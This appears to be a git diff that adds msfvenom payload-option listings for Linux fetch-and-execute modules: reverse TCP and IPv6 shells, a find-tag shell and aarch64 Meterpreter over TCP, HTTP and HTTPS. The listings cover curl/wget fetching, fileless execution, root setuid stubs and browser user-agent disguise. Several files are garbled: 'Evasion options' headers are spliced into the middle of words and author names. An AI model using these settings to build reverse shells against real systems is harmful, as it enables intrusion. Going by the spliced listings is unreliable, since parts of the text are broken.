server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no 
Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_find_tag.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_tag.txt new file mode 100644 index 0000000..69f75ac --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_tag.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Tag Inline + Module: payload/cmd/linux/http/x86/shell_find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME qhrtaensuGLm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no 
Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG zwyd yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..d7a466b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp.txt 
@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/x86/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WCKIPliQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the 
setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..09ba970 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp_ipv6.txt 
@@ -0,0 +1,87 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6 + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Matteo Malvica + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dIcIVvOhoFof no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no 
Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..32edb12 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,105 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Norma +Evasion options for payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp: +========================= + +c options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME liWpDnobGB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + 
MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..8e68fa8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/aarch64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/aarch64/meterpreter_reverse_http: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME THGriYheJPZd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..76ff2b4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_https.txt 
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/aarch64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/https/aarch64/meterpreter_reverse_https: +========================= + +pid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZquXiMMT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
